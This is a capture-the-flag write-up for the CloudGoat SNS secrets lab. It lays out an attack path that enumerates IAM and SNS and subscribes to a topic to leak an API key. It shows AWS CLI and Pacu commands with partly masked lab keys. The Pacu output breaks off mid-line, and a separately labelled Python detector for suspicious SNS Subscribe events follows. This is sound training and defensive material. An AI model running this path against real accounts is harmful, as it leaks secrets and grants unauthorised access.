🥷 CloudGoat: SNS Secrets: Write-up: Exploiting SNS subscriptions to leak API keys

via Dev.to (denesbeck)

🧭 Overview

Scenario: sns_secrets
Platform: CloudGoat (Rhino Security Labs)
Tools: Pacu + AWS CLI
Objective: Enumerate SNS topics, subscribe to leak secrets, and access protected API Gateway endpoints.

⚔️ Attack Path Summary

SNS User → IAM Enum → SNS Enum → Subscribe to Topic → Receive API Key → API Gateway Enum → Access Protected Endpoint → Flag

🔑 Phase 1: Initial Access

Configure Profile

```shell
aws configure --profile sns_secrets
# Access Key: AKIA****************
# Secret Key: 7C30FWO69LHE8JZt7RcZ********************
```

Validate Credentials

```shell
aws sts get-caller-identity --profile sns_secrets
```

```json
{
  "UserId": "AIDA****************",
  "Account": "7912********",
  "Arn": "arn:aws:iam::7912********:user/cg-sns-user-cgid38umo4q95r"
}
```

🔎 Phase 2: IAM Enumeration

Launch Pacu and Import Keys

```
pacu
Pacu > import_keys sns_secrets
```

Enumerate Permissions

```
Pacu > run iam__enum_permissions
Pacu > whoami
{ "UserName" : "cg-sns-user
```
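The attack path above (topic enumeration followed by a Subscribe call that delivers every published message, API key included, to an endpoint the caller controls) leaves a recognisable trail in CloudTrail. As an added defender-side example, not code from the write-up, CloudGoat or Pacu, the check below flags SNS Subscribe events that use an externally delivered protocol from a principal outside an assumed allowlist, and records which enumeration calls that principal made first. The account IDs, the deploy-role prefix and the sample events are constructed placeholders.

```python
from collections import defaultdict

# Assumed allowlist of principals expected to manage subscriptions (placeholder ARN prefix, not from the write-up)
ALLOWED_SUBSCRIBERS = ("arn:aws:iam::ACCOUNT_ID_PLACEHOLDER:role/deploy-",)
# Protocols that push the full message body to an endpoint the subscriber controls
EXFIL_PROTOCOLS = {"email", "email-json", "http", "https", "sms"}
ENUM_CALLS = {"ListTopics", "ListSubscriptions", "ListSubscriptionsByTopic", "GetTopicAttributes"}

def sns_subscription_findings(events):
    """Flag Subscribe calls using an externally delivered protocol from a principal outside the
    allowlist, and record which SNS enumeration calls that principal made earlier in the batch."""
    enum_seen, findings = defaultdict(set), []
    for ev in sorted(events, key=lambda e: e["eventTime"]):  # CloudTrail batches are not ordered
        if ev.get("eventSource") != "sns.amazonaws.com":
            continue
        principal, name = ev["userIdentity"]["arn"], ev["eventName"]
        if name in ENUM_CALLS:
            enum_seen[principal].add(name)
        elif name == "Subscribe":
            p = ev.get("requestParameters") or {}
            if p.get("protocol") in EXFIL_PROTOCOLS and not principal.startswith(ALLOWED_SUBSCRIBERS):
                findings.append({"principal": principal, "topic": p.get("topicArn"),
                                 "protocol": p.get("protocol"), "endpoint": p.get("endpoint"),
                                 "enumeration_before": sorted(enum_seen[principal])})
    return findings

def _ev(time, name, arn, params=None):  # minimal CloudTrail-shaped SNS event (constructed)
    return {"eventTime": time, "eventSource": "sns.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": arn}, "requestParameters": params}

USER = "arn:aws:iam::ACCOUNT_ID_PLACEHOLDER:user/cg-sns-user-example"
DEPLOY = "arn:aws:iam::ACCOUNT_ID_PLACEHOLDER:role/deploy-pipeline"
TOPIC = "arn:aws:sns:us-east-1:ACCOUNT_ID_PLACEHOLDER:example-topic"
SAMPLE_EVENTS = [  # constructed sample batch, deliberately out of time order
    _ev("2024-01-01T10:00:05Z", "Subscribe", USER,
        {"topicArn": TOPIC, "protocol": "email", "endpoint": "external@example.net"}),
    _ev("2024-01-01T10:00:01Z", "ListTopics", USER),
    _ev("2024-01-01T10:00:03Z", "GetTopicAttributes", USER, {"topicArn": TOPIC}),
    _ev("2024-01-01T09:00:00Z", "Subscribe", DEPLOY,  # allowlisted principal: not flagged
        {"topicArn": TOPIC, "protocol": "email", "endpoint": "ops@example.net"}),
    _ev("2024-01-01T09:30:00Z", "Subscribe", USER,  # in-account SQS delivery: not flagged
        {"topicArn": TOPIC, "protocol": "sqs", "endpoint": "arn:aws:sqs:us-east-1:ACCOUNT_ID_PLACEHOLDER:q"}),
]

if __name__ == "__main__":
    for finding in sns_subscription_findings(SAMPLE_EVENTS):
        print(finding)
```

The same rule can be applied to the topic side as a preventive control: a topic that carries secrets should have a resource policy restricting sns:Subscribe to the intended principals, so the Subscribe call is denied rather than merely logged.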

Continue reading on Dev.to

